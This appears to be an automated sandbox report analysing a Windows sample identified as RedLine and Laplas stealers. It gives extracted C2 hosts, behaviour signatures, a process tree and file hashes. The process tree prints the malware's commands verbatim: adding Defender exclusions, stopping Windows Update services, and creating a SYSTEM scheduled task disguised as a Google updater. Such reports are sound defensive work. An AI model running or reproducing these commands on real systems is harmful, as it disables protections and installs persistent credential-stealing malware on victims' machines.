Analysis

  • max time kernel
    281s
  • max time network
    304s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    16-07-2023 03:32

General

  • Target

    753fbc1dfa05d6007c5dfa534a7d019cbb24d07224b67ae9d48c9772039c63cd.exe

  • Size

    2.3MB

  • MD5

    9b06361b484531e8d71b64fbb32534d9

  • SHA1

    6c47e8bfaf1b82c57c861312f1fe130cc5e21c96

  • SHA256

    753fbc1dfa05d6007c5dfa534a7d019cbb24d07224b67ae9d48c9772039c63cd

  • SHA512

    dd9ab0d96801bdc8e541c60f0cb23f8c5089f8cefd4fa9041dae5d6d7e393f27ff25cc445117e3804f235fabce0fd2ae80d284463ef2278da5afb6a81f285bbb

  • SSDEEP

    49152:SgUFBrKkyuD7ug6e1NsUfgvig28JUU1y4unHZ1IxLRoV:eJK1umgBUU+n28uUMxHXIh6

Malware Config

Extracted

Family

redline

Botnet

150723_rc_11

C2

rcam15.tuktuk.ug:11290

Attributes
  • auth_value

    0b3645317afbcac212f68853bb45b46d

Extracted

Family

laplas

C2

http://lpls.tuktuk.ug

Attributes
  • api_key

    a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Themida packer 16 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1268
      • C:\Users\Admin\AppData\Local\Temp\753fbc1dfa05d6007c5dfa534a7d019cbb24d07224b67ae9d48c9772039c63cd.exe
        "C:\Users\Admin\AppData\Local\Temp\753fbc1dfa05d6007c5dfa534a7d019cbb24d07224b67ae9d48c9772039c63cd.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2560
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
          3⤵
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2976
          • C:\Users\Admin\AppData\Local\Temp\Octium.exe
            "C:\Users\Admin\AppData\Local\Temp\Octium.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of WriteProcessMemory
            PID:1692
            • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
              C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:2196
          • C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe
            "C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Drops file in Drivers directory
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            PID:3004
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2492
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2328
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:2240
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:668
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:1004
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:2800
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:2124
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1280
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:1672
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1432
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:940
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1792
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:764
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:2008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2532
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1688
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:2012
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:1644
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:2576
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:2672
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:2136
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1828
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:336
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
            PID:1648
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:528
            • C:\Windows\System32\powercfg.exe
              powercfg /x -standby-timeout-ac 0
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2812
            • C:\Windows\System32\powercfg.exe
              powercfg /x -standby-timeout-dc 0
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:592
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe
            2⤵
              PID:2984
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2908
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2140
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {48A4FF63-AD6C-4F72-9E2B-30AC45EFF66E} S-1-5-18:NT AUTHORITY\System:Service:
            1⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2220
            • C:\Program Files\Google\Chrome\updater.exe
              "C:\Program Files\Google\Chrome\updater.exe"
              2⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Drops file in Drivers directory
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1028
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2200

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • C:\Users\Admin\AppData\Local\Temp\Octium.exe

            Filesize

            5.1MB

            MD5

            2f5fffc7e0e41a5c84b551ce5a423389

            SHA1

            c95e5360ce09ac18d25e89e66c4f51db9cdec43b

            SHA256

            807f54c88592025c02077930259ed3a4c6a3e216a8d53350bbebcb5c597bab2d

            SHA512

            7dba8647e20f929d6debd98f2c6254e5cc54ea3249263df4743d9d6048a5061b9632ca595507e00e7230dd297736b9d5dd2fdfcc4451906793b29edc00f3234a

          • C:\Users\Admin\AppData\Local\Temp\Octium.exe

            Filesize

            5.1MB

            MD5

            2f5fffc7e0e41a5c84b551ce5a423389

            SHA1

            c95e5360ce09ac18d25e89e66c4f51db9cdec43b

            SHA256

            807f54c88592025c02077930259ed3a4c6a3e216a8d53350bbebcb5c597bab2d

            SHA512

            7dba8647e20f929d6debd98f2c6254e5cc54ea3249263df4743d9d6048a5061b9632ca595507e00e7230dd297736b9d5dd2fdfcc4451906793b29edc00f3234a

          • C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

            Filesize

            7KB

            MD5

            292d382e5e357cfc08817b5cf8c776fd

            SHA1

            53eeff89ed9b34c7f858e430dea454b9d6f22f86

            SHA256

            f9d03c39263637f3e45b61df343e5bcf667102e6e7ba5641c6b00d4ae89af342

            SHA512

            e84dd6ab733990109210d0052009c1cfc984e8a7830f545bf19dac2b03dde708c4297caf6b1e23d1c74beee68b8a6c7ddf39c04145c70344384f9e77c0a0203f

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RZ23SAD94BAZFE72GNT8.temp

            Filesize

            7KB

            MD5

            292d382e5e357cfc08817b5cf8c776fd

            SHA1

            53eeff89ed9b34c7f858e430dea454b9d6f22f86

            SHA256

            f9d03c39263637f3e45b61df343e5bcf667102e6e7ba5641c6b00d4ae89af342

            SHA512

            e84dd6ab733990109210d0052009c1cfc984e8a7830f545bf19dac2b03dde708c4297caf6b1e23d1c74beee68b8a6c7ddf39c04145c70344384f9e77c0a0203f

          • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

            Filesize

            822.1MB

            MD5

            5605a45cfa40172ba2fd8400ad84fa62

            SHA1

            4d084db6ab9aa221209f87ee7c5845655c933074

            SHA256

            0f1a8f3a689e2967f8dc102136b52b3dcf4e152a34c3c54cd6fa4e8af78e9ac0

            SHA512

            9cf55f6200dba0f5605c4e43ce909576822cf21d50815eb1e0b596bfe4de54bb89d5a51d6317a1d5d04726075948f4aeec0968cefd06fc3fdf3e2b3446c1db57

          • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

            Filesize

            822.1MB

            MD5

            5605a45cfa40172ba2fd8400ad84fa62

            SHA1

            4d084db6ab9aa221209f87ee7c5845655c933074

            SHA256

            0f1a8f3a689e2967f8dc102136b52b3dcf4e152a34c3c54cd6fa4e8af78e9ac0

            SHA512

            9cf55f6200dba0f5605c4e43ce909576822cf21d50815eb1e0b596bfe4de54bb89d5a51d6317a1d5d04726075948f4aeec0968cefd06fc3fdf3e2b3446c1db57

          • C:\Windows\System32\drivers\etc\hosts

            Filesize

            2KB

            MD5

            3e9af076957c5b2f9c9ce5ec994bea05

            SHA1

            a8c7326f6bceffaeed1c2bb8d7165e56497965fe

            SHA256

            e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

            SHA512

            933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

          • \Program Files\Google\Chrome\updater.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • \Users\Admin\AppData\Local\Temp\Octium.exe

            Filesize

            5.1MB

            MD5

            2f5fffc7e0e41a5c84b551ce5a423389

            SHA1

            c95e5360ce09ac18d25e89e66c4f51db9cdec43b

            SHA256

            807f54c88592025c02077930259ed3a4c6a3e216a8d53350bbebcb5c597bab2d

            SHA512

            7dba8647e20f929d6debd98f2c6254e5cc54ea3249263df4743d9d6048a5061b9632ca595507e00e7230dd297736b9d5dd2fdfcc4451906793b29edc00f3234a

          • \Users\Admin\AppData\Local\Temp\TaskMnr.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • \Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

            Filesize

            822.1MB

            MD5

            5605a45cfa40172ba2fd8400ad84fa62

            SHA1

            4d084db6ab9aa221209f87ee7c5845655c933074

            SHA256

            0f1a8f3a689e2967f8dc102136b52b3dcf4e152a34c3c54cd6fa4e8af78e9ac0

            SHA512

            9cf55f6200dba0f5605c4e43ce909576822cf21d50815eb1e0b596bfe4de54bb89d5a51d6317a1d5d04726075948f4aeec0968cefd06fc3fdf3e2b3446c1db57

          • memory/1280-209-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

            Filesize

            2.9MB

          • memory/1280-210-0x0000000002880000-0x0000000002900000-memory.dmp

            Filesize

            512KB

          • memory/1280-214-0x000007FEF44D0000-0x000007FEF4E6D000-memory.dmp

            Filesize

            9.6MB

          • memory/1280-206-0x0000000002880000-0x0000000002900000-memory.dmp

            Filesize

            512KB

          • memory/1280-213-0x0000000002880000-0x0000000002900000-memory.dmp

            Filesize

            512KB

          • memory/1280-208-0x0000000002880000-0x0000000002900000-memory.dmp

            Filesize

            512KB

          • memory/1280-207-0x000007FEF44D0000-0x000007FEF4E6D000-memory.dmp

            Filesize

            9.6MB

          • memory/1280-211-0x0000000001F10000-0x0000000001F18000-memory.dmp

            Filesize

            32KB

          • memory/1280-205-0x000007FEF44D0000-0x000007FEF4E6D000-memory.dmp

            Filesize

            9.6MB

          • memory/1692-143-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-168-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-158-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-156-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-155-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-160-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-161-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-142-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-166-0x0000000028740000-0x0000000029168000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-159-0x0000000077140000-0x00000000772E9000-memory.dmp

            Filesize

            1.7MB

          • memory/1692-140-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-137-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-136-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-133-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-132-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-131-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-130-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-129-0x0000000077140000-0x00000000772E9000-memory.dmp

            Filesize

            1.7MB

          • memory/1692-128-0x0000000000860000-0x0000000001288000-memory.dmp

            Filesize

            10.2MB

          • memory/1692-169-0x0000000077140000-0x00000000772E9000-memory.dmp

            Filesize

            1.7MB

          • memory/2196-176-0x0000000001020000-0x0000000001A48000-memory.dmp

            Filesize

            10.2MB

          • memory/2196-175-0x0000000001020000-0x0000000001A48000-memory.dmp

            Filesize

            10.2MB

          • memory/2196-171-0x0000000077140000-0x00000000772E9000-memory.dmp

            Filesize

            1.7MB

          • memory/2196-212-0x0000000001020000-0x0000000001A48000-memory.dmp

            Filesize

            10.2MB

          • memory/2196-204-0x0000000077140000-0x00000000772E9000-memory.dmp

            Filesize

            1.7MB

          • memory/2196-172-0x0000000001020000-0x0000000001A48000-memory.dmp

            Filesize

            10.2MB

          • memory/2196-195-0x0000000001020000-0x0000000001A48000-memory.dmp

            Filesize

            10.2MB

          • memory/2196-173-0x0000000001020000-0x0000000001A48000-memory.dmp

            Filesize

            10.2MB

          • memory/2196-174-0x0000000001020000-0x0000000001A48000-memory.dmp

            Filesize

            10.2MB

          • memory/2196-170-0x0000000001020000-0x0000000001A48000-memory.dmp

            Filesize

            10.2MB

          • memory/2196-177-0x0000000001020000-0x0000000001A48000-memory.dmp

            Filesize

            10.2MB

          • memory/2196-181-0x0000000001020000-0x0000000001A48000-memory.dmp

            Filesize

            10.2MB

          • memory/2492-189-0x0000000002420000-0x0000000002428000-memory.dmp

            Filesize

            32KB

          • memory/2492-188-0x000000001B010000-0x000000001B2F2000-memory.dmp

            Filesize

            2.9MB

          • memory/2492-190-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

            Filesize

            9.6MB

          • memory/2492-191-0x0000000002430000-0x00000000024B0000-memory.dmp

            Filesize

            512KB

          • memory/2492-192-0x0000000002430000-0x00000000024B0000-memory.dmp

            Filesize

            512KB

          • memory/2492-193-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

            Filesize

            9.6MB

          • memory/2492-194-0x0000000002430000-0x00000000024B0000-memory.dmp

            Filesize

            512KB

          • memory/2492-196-0x0000000002430000-0x00000000024B0000-memory.dmp

            Filesize

            512KB

          • memory/2492-197-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

            Filesize

            9.6MB

          • memory/2560-80-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-70-0x0000000075AA0000-0x0000000075AE7000-memory.dmp

            Filesize

            284KB

          • memory/2560-55-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-54-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-56-0x0000000075AA0000-0x0000000075AE7000-memory.dmp

            Filesize

            284KB

          • memory/2560-59-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-98-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-61-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-96-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-94-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-90-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-92-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-86-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-88-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-82-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-84-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-78-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-60-0x0000000075AA0000-0x0000000075AE7000-memory.dmp

            Filesize

            284KB

          • memory/2560-76-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-62-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-75-0x00000000003B0000-0x00000000003C5000-memory.dmp

            Filesize

            84KB

          • memory/2560-66-0x0000000077330000-0x0000000077332000-memory.dmp

            Filesize

            8KB

          • memory/2560-65-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-64-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-63-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-67-0x0000000000A50000-0x000000000100A000-memory.dmp

            Filesize

            5.7MB

          • memory/2560-53-0x0000000000A50000-0x000000000100A000-memory.dmp

            Filesize

            5.7MB

          • memory/2560-68-0x0000000000A50000-0x000000000100A000-memory.dmp

            Filesize

            5.7MB

          • memory/2560-71-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-72-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-73-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-74-0x00000000003B0000-0x00000000003CC000-memory.dmp

            Filesize

            112KB

          • memory/2560-116-0x0000000000A50000-0x000000000100A000-memory.dmp

            Filesize

            5.7MB

          • memory/2560-114-0x0000000075240000-0x0000000075350000-memory.dmp

            Filesize

            1.1MB

          • memory/2560-115-0x0000000075AA0000-0x0000000075AE7000-memory.dmp

            Filesize

            284KB

          • memory/2976-99-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2976-105-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

